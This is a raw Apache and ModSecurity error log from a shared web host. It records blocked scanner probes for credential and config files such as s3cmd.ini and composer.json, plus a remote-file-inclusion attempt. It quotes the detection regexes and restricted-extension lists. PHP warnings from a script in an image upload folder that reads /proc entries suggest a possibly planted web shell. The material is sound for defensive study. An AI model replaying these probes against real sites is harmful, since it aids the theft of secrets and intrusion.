[Mon May 11 22:46:20.162740 2026] [ssl:error] [pid 1601130:tid 1601160] (EAI 2)Name or service not known: [client 66.249.69.106:64328] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:46:20.162887 2026] [ssl:error] [pid 1601130:tid 1601160] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:20.627604 2026] [ssl:error] [pid 1588898:tid 1588910] (EAI 2)Name or service not known: [client 191.101.245.34:64918] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 22:46:20.627633 2026] [ssl:error] [pid 1588898:tid 1588910] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:20.634709 2026] [ssl:error] [pid 1601130:tid 1601150] (EAI 2)Name or service not known: [client 66.249.69.106:59705] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:46:20.634743 2026] [ssl:error] [pid 1601130:tid 1601150] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:22.108449 2026] [ssl:error] [pid 1590352:tid 1590401] (EAI 2)Name or service not known: [client 66.249.69.106:38826] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:46:22.108482 2026] [ssl:error] [pid 1590352:tid 1590401] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:22.616448 2026] [ssl:error] [pid 1606352:tid 1606421] (EAI 2)Name or service not known: [client 66.249.69.106:57261] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:46:22.616481 2026] [ssl:error] [pid 1606352:tid 1606421] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:24.179816 2026] [ssl:error] [pid 1606352:tid 1606435] (EAI 2)Name or service not known: [client 66.249.69.107:54555] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:46:24.179847 2026] [ssl:error] [pid 1606352:tid 1606435] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:24.648708 2026] [ssl:error] [pid 1590352:tid 1590393] (EAI 2)Name or service not known: [client 66.249.69.107:38293] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:46:24.648734 2026] [ssl:error] [pid 1590352:tid 1590393] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:25.729816 2026] [ssl:error] [pid 1605480:tid 1605541] (EAI 2)Name or service not known: [client 66.249.69.106:55207] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:46:25.729860 2026] [ssl:error] [pid 1605480:tid 1605541] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:26.230852 2026] [ssl:error] [pid 1588898:tid 1590048] (EAI 2)Name or service not known: [client 66.249.69.106:51609] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:46:26.230887 2026] [ssl:error] [pid 1588898:tid 1590048] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:38.310651 2026] [ssl:error] [pid 1588898:tid 1588901] (EAI 2)Name or service not known: [client 66.249.69.106:47236] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:46:38.310693 2026] [ssl:error] [pid 1588898:tid 1588901] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:38.805730 2026] [ssl:error] [pid 1590352:tid 1590411] (EAI 2)Name or service not known: [client 66.249.69.106:53539] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:46:38.805768 2026] [ssl:error] [pid 1590352:tid 1590411] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:43.061230 2026] [security2:error] [pid 1588898:tid 1588920] [client 49.51.72.76:40526] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/wp-json/"] [unique_id "agJAM6FW67LJTsgN3jQSPgAAABY"]
[Mon May 11 22:47:05.220228 2026] [security2:error] [pid 1606352:tid 1606441] [client 43.135.140.225:41920] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pweil.com"] [uri "/"] [unique_id "agJASXo_DFxNSZVmaX3XtQAAANY"]
[Mon May 11 22:47:35.441747 2026] [:error] [pid 1606352:tid 1606428] [client 47.128.120.15:21472] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 22:48:00.763108 2026] [security2:error] [pid 1590352:tid 1590411] [client 49.51.52.250:50228] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJAgK1q0G_aXAqWauQCUgAAAJM"]
[Mon May 11 22:48:01.225058 2026] [security2:error] [pid 1605480:tid 1605537] [client 47.128.46.8:52280] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json.sorry"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/composer.json.sorry"] [unique_id "agJAgR2Cvzd_nyNfUm8GfAAAAQ8"]
[Mon May 11 22:48:01.225332 2026] [security2:error] [pid 1605480:tid 1605537] [client 47.128.46.8:52280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/composer.json.sorry"] [unique_id "agJAgR2Cvzd_nyNfUm8GfAAAAQ8"]
[Mon May 11 22:48:01.351127 2026] [security2:error] [pid 1605480:tid 1605537] [client 47.128.46.8:52280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJAgR2Cvzd_nyNfUm8GfAAAAQ8"]
[Mon May 11 22:48:05.063831 2026] [security2:error] [pid 1590352:tid 1590401] [client 43.156.18.240:37488] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.naturedetres.fr"] [uri "/"] [unique_id "agJAha1q0G_aXAqWauQCXwAAAIk"]
[Mon May 11 22:48:33.869323 2026] [ssl:error] [pid 1606352:tid 1606439] (EAI 2)Name or service not known: [client 167.172.212.10:38968] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:48:33.869634 2026] [ssl:error] [pid 1606352:tid 1606439] AH01941: stapling_renew_response: responder error
[Mon May 11 22:48:35.010005 2026] [ssl:error] [pid 1601130:tid 1601159] (EAI 2)Name or service not known: [client 134.199.71.127:44129] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:48:35.010048 2026] [ssl:error] [pid 1601130:tid 1601159] AH01941: stapling_renew_response: responder error
[Mon May 11 22:48:35.621480 2026] [ssl:error] [pid 1630927:tid 1630941] (EAI 2)Name or service not known: [client 168.158.193.215:37439] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:48:35.621534 2026] [ssl:error] [pid 1630927:tid 1630941] AH01941: stapling_renew_response: responder error
[Mon May 11 22:48:36.519719 2026] [ssl:error] [pid 1605480:tid 1605546] (EAI 2)Name or service not known: [client 95.136.85.137:43319] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:48:36.519759 2026] [ssl:error] [pid 1605480:tid 1605546] AH01941: stapling_renew_response: responder error
[Mon May 11 22:48:39.543036 2026] [ssl:error] [pid 1601130:tid 1601166] (EAI 2)Name or service not known: [client 178.128.5.120:48788] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:48:39.543073 2026] [ssl:error] [pid 1601130:tid 1601166] AH01941: stapling_renew_response: responder error
[Mon May 11 22:48:41.391544 2026] [ssl:error] [pid 1630927:tid 1630936] (EAI 2)Name or service not known: [client 140.174.124.82:37421] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:48:41.391587 2026] [ssl:error] [pid 1630927:tid 1630936] AH01941: stapling_renew_response: responder error
[Mon May 11 22:48:42.663652 2026] [ssl:error] [pid 1601130:tid 1601173] (EAI 2)Name or service not known: [client 158.46.212.98:40165] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:48:42.663683 2026] [ssl:error] [pid 1601130:tid 1601173] AH01941: stapling_renew_response: responder error
[Mon May 11 22:48:52.096977 2026] [ssl:error] [pid 1605480:tid 1605545] (EAI 2)Name or service not known: [client 134.199.228.252:60704] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:48:52.097463 2026] [ssl:error] [pid 1605480:tid 1605545] AH01941: stapling_renew_response: responder error
[Mon May 11 22:48:55.493220 2026] [ssl:error] [pid 1601130:tid 1601160] (EAI 2)Name or service not known: [client 161.123.210.228:41033] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:48:55.493251 2026] [ssl:error] [pid 1601130:tid 1601160] AH01941: stapling_renew_response: responder error
[Mon May 11 22:48:58.605966 2026] [ssl:error] [pid 1601130:tid 1601154] (EAI 2)Name or service not known: [client 200.239.226.73:36335] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:48:58.606005 2026] [ssl:error] [pid 1601130:tid 1601154] AH01941: stapling_renew_response: responder error
[Mon May 11 22:49:04.095494 2026] [ssl:error] [pid 1630927:tid 1630932] (EAI 2)Name or service not known: [client 164.92.83.224:60438] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:49:04.095700 2026] [ssl:error] [pid 1630927:tid 1630932] AH01941: stapling_renew_response: responder error
[Mon May 11 22:49:08.533771 2026] [ssl:error] [pid 1590352:tid 1590400] (EAI 2)Name or service not known: [client 158.46.205.45:37953] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:49:08.533836 2026] [ssl:error] [pid 1590352:tid 1590400] AH01941: stapling_renew_response: responder error
[Mon May 11 22:49:30.890234 2026] [:error] [pid 1588898:tid 1588909] [client 74.7.241.35:58828] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/product/housing/
PHP Warning:  filesize(): stat failed for /proc/212/task/212/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/212/task/212/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/212/task/212/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/212/task/212/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/212/task/212/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/212/task/212/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:50:08.778582 2026] [security2:error] [pid 1590352:tid 1590392] [client 57.141.20.41:61842] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://134.209.111.26 found within ARGS:url: https://134.209.111.26"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBAK1q0G_aXAqWauQCzgAAAIA"]
[Mon May 11 22:50:08.779267 2026] [security2:error] [pid 1590352:tid 1590392] [client 57.141.20.41:61842] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBAK1q0G_aXAqWauQCzgAAAIA"]
[Mon May 11 22:50:08.779522 2026] [security2:error] [pid 1590352:tid 1590392] [client 57.141.20.41:61842] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBAK1q0G_aXAqWauQCzgAAAIA"]
[Mon May 11 22:50:21.769223 2026] [:error] [pid 1601130:tid 1601157] [client 114.119.146.171:31847] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/post_tag-sitemap.xml
[Mon May 11 22:50:35.228279 2026] [autoindex:error] [pid 1605480:tid 1605535] [client 45.148.10.67:61214] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 22:50:46.227873 2026] [security2:error] [pid 1606352:tid 1606442] [client 43.135.133.241:56582] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/envie-de-savoir/"] [unique_id "agJBJno_DFxNSZVmaX3YmgAAANc"]
[Mon May 11 22:50:52.932165 2026] [security2:error] [pid 1605480:tid 1605531] [client 43.166.136.24:41522] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/documents.html"] [unique_id "agJBLB2Cvzd_nyNfUm8HZQAAAQk"]
[Mon May 11 22:51:07.946971 2026] [core:error] [pid 1590352:tid 1590409] [client 20.63.80.119:64453] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:07.947009 2026] [core:error] [pid 1590352:tid 1590409] [client 20.63.80.119:64453] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:08.358341 2026] [core:error] [pid 1588898:tid 1588913] [client 20.63.80.119:64467] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:08.358567 2026] [core:error] [pid 1588898:tid 1588913] [client 20.63.80.119:64467] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:08.924506 2026] [core:error] [pid 1590352:tid 1590402] [client 20.63.80.119:64475] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:08.924540 2026] [core:error] [pid 1590352:tid 1590402] [client 20.63.80.119:64475] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:09.335702 2026] [security2:error] [pid 1630927:tid 1630935] [client 209.50.170.115:53527] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/s3cmd.ini"] [unique_id "agJBPWiGYYhUwDaJINmU3wAAAUU"]
[Mon May 11 22:51:09.336076 2026] [security2:error] [pid 1630927:tid 1630935] [client 209.50.170.115:53527] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/s3cmd.ini"] [unique_id "agJBPWiGYYhUwDaJINmU3wAAAUU"]
[Mon May 11 22:51:09.452234 2026] [core:error] [pid 1588898:tid 1588918] [client 20.63.80.119:64462] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:09.452263 2026] [core:error] [pid 1588898:tid 1588918] [client 20.63.80.119:64462] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:09.700379 2026] [core:error] [pid 1601130:tid 1601150] [client 20.63.80.119:64468] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:09.700410 2026] [core:error] [pid 1601130:tid 1601150] [client 20.63.80.119:64468] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:10.013509 2026] [core:error] [pid 1590352:tid 1590398] [client 20.63.80.119:64522] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:10.013538 2026] [core:error] [pid 1590352:tid 1590398] [client 20.63.80.119:64522] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:10.344110 2026] [core:error] [pid 1605480:tid 1605533] [client 20.63.80.119:64476] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:10.344145 2026] [core:error] [pid 1605480:tid 1605533] [client 20.63.80.119:64476] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:10.603348 2026] [security2:error] [pid 1630927:tid 1630935] [client 209.50.170.115:53527] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJBPWiGYYhUwDaJINmU3wAAAUU"]
[Mon May 11 22:51:10.621593 2026] [core:error] [pid 1588898:tid 1588903] [client 20.63.80.119:64548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:10.621619 2026] [core:error] [pid 1588898:tid 1588903] [client 20.63.80.119:64548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:10.918001 2026] [core:error] [pid 1590352:tid 1590412] [client 20.63.80.119:64560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:10.918030 2026] [core:error] [pid 1590352:tid 1590412] [client 20.63.80.119:64560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:11.547769 2026] [core:error] [pid 1588898:tid 1588921] [client 20.63.80.119:64519] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:11.547801 2026] [core:error] [pid 1588898:tid 1588921] [client 20.63.80.119:64519] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:12.135969 2026] [core:error] [pid 1630927:tid 1630936] [client 20.63.80.119:64531] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:12.135995 2026] [core:error] [pid 1630927:tid 1630936] [client 20.63.80.119:64531] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:12.588595 2026] [core:error] [pid 1606352:tid 1606430] [client 20.63.80.119:64547] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:12.588632 2026] [core:error] [pid 1606352:tid 1606430] [client 20.63.80.119:64547] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:13.187803 2026] [core:error] [pid 1606352:tid 1606431] [client 20.63.80.119:64459] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:13.187829 2026] [core:error] [pid 1606352:tid 1606431] [client 20.63.80.119:64459] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:13.822377 2026] [core:error] [pid 1590352:tid 1590392] [client 20.63.80.119:64455] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:13.822403 2026] [core:error] [pid 1590352:tid 1590392] [client 20.63.80.119:64455] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:14.191179 2026] [core:error] [pid 1606352:tid 1606437] [client 20.63.80.119:64457] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:14.191203 2026] [core:error] [pid 1606352:tid 1606437] [client 20.63.80.119:64457] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
